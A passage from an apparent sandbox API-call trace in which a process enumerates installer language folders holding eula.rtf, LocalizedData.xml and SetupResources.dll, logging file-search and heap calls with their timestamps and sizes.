ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.828] FindNextFileW (in: hFindFile=0x42605c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.828] FindClose (in: hFindFile=0x42605c8 | out: hFindFile=0x42605c8) returned 1 [0045.829] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.829] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1031", cAlternateFileName="")) returned 1 [0045.829] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4240048 [0045.829] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1031\\*", lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260108 [0045.829] FindNextFileW (in: hFindFile=0x4260108, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.829] FindNextFileW (in: hFindFile=0x4260108, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xd5b, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.829] FindNextFileW (in: hFindFile=0x4260108, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x141aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.830] FindNextFileW (in: hFindFile=0x4260108, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.830] FindNextFileW (in: hFindFile=0x4260108, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.830] FindClose (in: hFindFile=0x4260108 | out: hFindFile=0x4260108) returned 1 [0045.830] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.830] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1032", cAlternateFileName="")) returned 1 [0045.830] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4240048 [0045.830] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1032\\*", lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260588 [0045.832] FindNextFileW (in: hFindFile=0x4260588, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.832] FindNextFileW (in: hFindFile=0x4260588, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x22ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.832] FindNextFileW (in: hFindFile=0x4260588, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1510c, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.832] FindNextFileW (in: hFindFile=0x4260588, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.833] FindNextFileW (in: hFindFile=0x4260588, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.833] FindClose (in: hFindFile=0x4260588 | out: hFindFile=0x4260588) returned 1 [0045.833] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.833] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1033", cAlternateFileName="")) returned 1 [0045.834] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4240048 [0045.834] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1033\\*", lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42607c8 [0045.835] FindNextFileW (in: hFindFile=0x42607c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.835] FindNextFileW (in: hFindFile=0x42607c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd723cc00, ftCreationTime.dwHighDateTime=0x1cabb47, ftLastAccessTime.dwLowDateTime=0xd723cc00, ftLastAccessTime.dwHighDateTime=0x1cabb47, ftLastWriteTime.dwLowDateTime=0xd723cc00, ftLastWriteTime.dwHighDateTime=0x1cabb47, nFileSizeHigh=0x0, nFileSizeLow=0xc74, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.835] FindNextFileW (in: hFindFile=0x42607c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x47ad1a00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x47ad1a00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x47ad1a00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12db0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.835] FindNextFileW (in: hFindFile=0x42607c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.835] FindNextFileW (in: hFindFile=0x42607c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.835] FindClose (in: hFindFile=0x42607c8 | out: hFindFile=0x42607c8) returned 1 [0045.836] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.836] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1035", cAlternateFileName="")) returned 1 [0045.836] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4240048 [0045.836] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1035\\*", lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260388 [0045.837] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.837] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe76, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.838] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12cde, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.838] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.838] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.838] FindClose (in: hFindFile=0x4260388 | out: hFindFile=0x4260388) returned 1 [0045.839] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.839] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1036", cAlternateFileName="")) returned 1 [0045.839] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4240048 [0045.839] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1036\\*", lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42600c8 [0045.840] FindNextFileW (in: hFindFile=0x42600c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.840] FindNextFileW (in: hFindFile=0x42600c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xdc6, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.840] FindNextFileW (in: hFindFile=0x42600c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x14412, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.840] FindNextFileW (in: hFindFile=0x42600c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.840] FindNextFileW (in: hFindFile=0x42600c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.840] FindClose (in: hFindFile=0x42600c8 | out: hFindFile=0x42600c8) returned 1 [0045.840] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.841] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1037", cAlternateFileName="")) returned 1 [0045.841] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4240048 [0045.841] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1037\\*", lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42600c8 [0045.841] FindNextFileW (in: hFindFile=0x42600c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.841] FindNextFileW (in: hFindFile=0x42600c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x1ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.841] FindNextFileW (in: hFindFile=0x42600c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1198c, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.841] FindNextFileW (in: hFindFile=0x42600c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4158, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.841] FindNextFileW (in: hFindFile=0x42600c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, 